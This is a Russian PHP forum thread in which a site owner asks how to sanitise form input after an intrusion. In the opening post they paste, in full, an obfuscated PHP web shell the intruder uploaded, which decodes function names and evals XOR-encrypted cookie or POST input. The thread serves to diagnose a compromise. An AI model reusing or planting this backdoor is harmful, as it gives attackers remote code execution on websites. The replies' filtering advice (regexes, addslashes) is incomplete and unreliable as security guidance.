Уязвимость при отправке формы

@Gerd199 · 09.06.2018, 17:05. **Показов** 1804. **Ответов** 9

Студворк — интернет-сервис помощи студентам

Дело в том, что при отправке формы, прописав определенный код.
Пользователь может вносить изменнения в скрипты.

PHP
1
2
3
4
5
    foreach ($_REQUEST as $key => $value){
        $value = strip_tags($value);
        $value = addslashes($value);
        $data[$key] = trim($value); 
    }

Что еще можно добавить для фильтра?

Выявил чисто из-за того что когда пользователь отправляет заявку на обратный звонок, приходит письмо на почту. В нем всякий код...

К примеру содержимое одного из скрипта который взломщик залил

PHP
1
2
<?php
$nmrvj = 'sv6g87t24y9b3lm5nud*aoH#1pkcif0-xre\'_';$qvrdn = Array();$qvrdn[] = $nmrvj[27].$nmrvj[2].$nmrvj[24].$nmrvj[12].$nmrvj[15].$nmrvj[5].$nmrvj[2].$nmrvj[29].$nmrvj[31].$nmrvj[8].$nmrvj[12].$nmrvj[11].$nmrvj[4].$nmrvj[31].$nmrvj[8].$nmrvj[30].$nmrvj[8].$nmrvj[5].$nmrvj[31].$nmrvj[20].$nmrvj[7].$nmrvj[27].$nmrvj[8].$nmrvj[31].$nmrvj[30].$nmrvj[2].$nmrvj[7].$nmrvj[29].$nmrvj[10].$nmrvj[30].$nmrvj[12].$nmrvj[10].$nmrvj[11].$nmrvj[4].$nmrvj[15].$nmrvj[18];$qvrdn[] = $nmrvj[22].$nmrvj[19];$qvrdn[] = $nmrvj[23];$qvrdn[] = $nmrvj[27].$nmrvj[21].$nmrvj[17].$nmrvj[16].$nmrvj[6];$qvrdn[] = $nmrvj[0].$nmrvj[6].$nmrvj[33].$nmrvj[36].$nmrvj[33].$nmrvj[34].$nmrvj[25].$nmrvj[34].$nmrvj[20].$nmrvj[6];$qvrdn[] = $nmrvj[34].$nmrvj[32].$nmrvj[25].$nmrvj[13].$nmrvj[21].$nmrvj[18].$nmrvj[34];$qvrdn[] = $nmrvj[0].$nmrvj[17].$nmrvj[11].$nmrvj[0].$nmrvj[6].$nmrvj[33];$qvrdn[] = $nmrvj[20].$nmrvj[33].$nmrvj[33].$nmrvj[20].$nmrvj[9].$nmrvj[36].$nmrvj[14].$nmrvj[34].$nmrvj[33].$nmrvj[3].$nmrvj[34];$qvrdn[] = $nmrvj[0].$nmrvj[6].$nmrvj[33].$nmrvj[13].$nmrvj[34].$nmrvj[16];$qvrdn[] = $nmrvj[25].$nmrvj[20].$nmrvj[27].$nmrvj[26];foreach ($qvrdn[7]($_COOKIE, $_POST) as $obkoxl => $frkfef){function mifpy($qvrdn, $obkoxl, $qhutc){return $qvrdn[6]($qvrdn[4]($obkoxl . $qvrdn[0], ($qhutc / $qvrdn[8]($obkoxl)) + 1), 0, $qhutc);}function hcarph($qvrdn, $ljwixvl){return @$qvrdn[9]($qvrdn[1], $ljwixvl);}function odjon($qvrdn, $ljwixvl){$lmibj = $qvrdn[3]($ljwixvl) % 3;if (!$lmibj) {eval($ljwixvl[1]($ljwixvl[2]));exit();}}$frkfef = hcarph($qvrdn, $frkfef);odjon($qvrdn, $qvrdn[5]($qvrdn[2], $frkfef ^ mifpy($qvrdn, $obkoxl, $qvrdn[8]($frkfef))));}

@Mr_Sergo · 09.06.2018, 17:15

Gerd199, по патерну проверять неа?

@Jewbacabra · 09.06.2018, 17:19

Нужно брать качеством, а не количеством.

@coder02 · 09.06.2018, 17:23

Взгляни в сторону php-функций filter_input и filter_var. Они позволяют в том числе и очистить вводимые данные по опреденному образцу

@Gerd199 · 18.06.2018, 10:40 **[ТС]**

Можно пожалуйста пример того, как это реализовано у других. ??

@edward_freedom · 18.06.2018, 13:59

Gerd199, Ну так загляни в документацию и посмотри, чего же ты ждешь http://php.net/manual/ru/function.filter-input.php

@Para bellum · 19.06.2018, 09:25

Сообщение от Gerd199

Выявил чисто из-за того что когда пользователь отправляет заявку на обратный звонок, приходит письмо на почту. В нем всякий код...

Это не уязвимость. Мало ли что можно в форме обратной связи написать. Если бы Вам гадости через неё писали, Вы бы не подумали же, что это уязвимость?

@Gerd199 · 13.08.2018, 10:39 **[ТС]**

Выручайте, скиньте пожалуйста свой пример того как вы фильтруете. Как сделать так, чтобы собрать все в один массив и недопустить заливки или правки php файлов злоумышленниками

@andyyy · 13.08.2018, 15:14

Регулярки

@Gerd199 · 14.08.2018, 20:35 **[ТС]**

0s.mfzgo3dbonzs44tv.nblz.ru/

Выручайте, не понимаю. что это, случайно через метрику отследил. напрямую черз домен блокирует мол безопасность, даже в исключения не могу добавить

Добавлено через 49 секунд
Все файлы сайта чисты, нет вредоносного кода

Новые блоги и статьи Все статьи Все блоги /
Кто-нибудь знает, где можно бесплатно получить настольный компьютер или ноутбук? США. Programma_Boinc 26.12.2025 Кто-нибудь знает, где можно бесплатно получить настольный компьютер или ноутбук? США. Нашел на реддите интересную статью под названием «Кто-нибудь знает, где получить бесплатный компьютер или. . .	Thinkpad X220 Tablet — это лучший бюджетный ноутбук для учёбы, точка. Programma_Boinc 23.12.2025 Рецензия / Мнение/ Перевод Нашел на реддите интересную статью под названием The Thinkpad X220 Tablet is the best budget school laptop period . Ниже её машинный перевод. Thinkpad X220 Tablet —. . .	PhpStorm 2025.3: WSL Terminal всегда стартует в ~ and_y87 14.12.2025 PhpStorm 2025. 3: WSL Terminal всегда стартует в ~ (home), игнорируя директорию проекта Симптом: После обновления до PhpStorm 2025. 3 встроенный терминал WSL открывается в домашней директории. . .	Как объединить две одинаковые БД Access с разными данными VikBal 11.12.2025 Помогите пожалуйста !! Как объединить 2 одинаковые БД Access с разными данными.	Новый ноутбук volvo 07.12.2025 Всем привет. По скидке в "черную пятницу" взял себе новый ноутбук Lenovo ThinkBook 16 G7 на Амазоне: Ryzen 5 7533HS 64 Gb DDR5 1Tb NVMe 16" Full HD Display Win11 Pro
Музыка, написанная Искусственным Интеллектом volvo 04.12.2025 Всем привет. Некоторое время назад меня заинтересовало, что уже умеет ИИ в плане написания музыки для песен, и, собственно, исполнения этих самых песен. Стихов у нас много, уже вышли 4 книги, еще 3. . .	От async/await к виртуальным потокам в Python IndentationError 23.11.2025 Армин Ронахер поставил под сомнение async/ await. Создатель Flask заявляет: цветные функции - провал, виртуальные потоки - решение. Не threading-динозавры, а новое поколение лёгких потоков. Откат?. . .	Поиск "дружественных имён" СОМ портов Argus19 22.11.2025 Поиск "дружественных имён" СОМ портов На странице: https:/ / norseev. ru/ 2018/ 01/ 04/ comportlist_windows/ нашёл схожую тему. Там приведён код на С++, который показывает только имена СОМ портов, типа,. . .	Сколько Государство потратило денег на меня, обеспечивая инсулином. Programma_Boinc 20.11.2025 Сколько Государство потратило денег на меня, обеспечивая инсулином. Вот решила сделать интересный приблизительный подсчет, сколько государство потратило на меня денег на покупку инсулинов. . . .	Ломающие изменения в C#.NStar Alpha Etyuhibosecyu 20.11.2025 Уже можно не только тестировать, но и пользоваться C#. NStar - писать оконные приложения, содержащие надписи, кнопки, текстовые поля и даже изображения, например, моя игра "Три в ряд" написана на этом. . .

@Mr_Sergo 2037 / 1096 / 409 Регистрация: 29.04.2016 Сообщений: 2,625
	09.06.2018, 17:15
	Gerd199, по патерну проверять неа? 0

@Jewbacabra 4925 / 3920 / 1620 Регистрация: 24.04.2014 Сообщений: 11,441
	09.06.2018, 17:19
	Нужно брать качеством, а не количеством. 0

@coder02 6 / 6 / 2 Регистрация: 28.12.2016 Сообщений: 30
	09.06.2018, 17:23
	Взгляни в сторону php-функций filter_input и filter_var. Они позволяют в том числе и очистить вводимые данные по опреденному образцу 0

@Gerd199 Заблокирован
	18.06.2018, 10:40 [ТС]
	Можно пожалуйста пример того, как это реализовано у других. ?? 0

@edward_freedom 1569 / 1448 / 303 Регистрация: 01.10.2011 Сообщений: 2,636
	18.06.2018, 13:59
	Gerd199, Ну так загляни в документацию и посмотри, чего же ты ждешь http://php.net/manual/ru/function.filter-input.php 0

@Gerd199 Заблокирован
	13.08.2018, 10:39 [ТС]
	Выручайте, скиньте пожалуйста свой пример того как вы фильтруете. Как сделать так, чтобы собрать все в один массив и недопустить заливки или правки php файлов злоумышленниками 0

@andyyy 767 / 323 / 157 Регистрация: 26.05.2016 Сообщений: 2,127
	13.08.2018, 15:14
	Регулярки 0

@Gerd199 Заблокирован
	14.08.2018, 20:35 [ТС]
	0s.mfzgo3dbonzs44tv.nblz.ru/ Выручайте, не понимаю. что это, случайно через метрику отследил. напрямую черз домен блокирует мол безопасность, даже в исключения не могу добавить Добавлено через 49 секунд Все файлы сайта чисты, нет вредоносного кода 0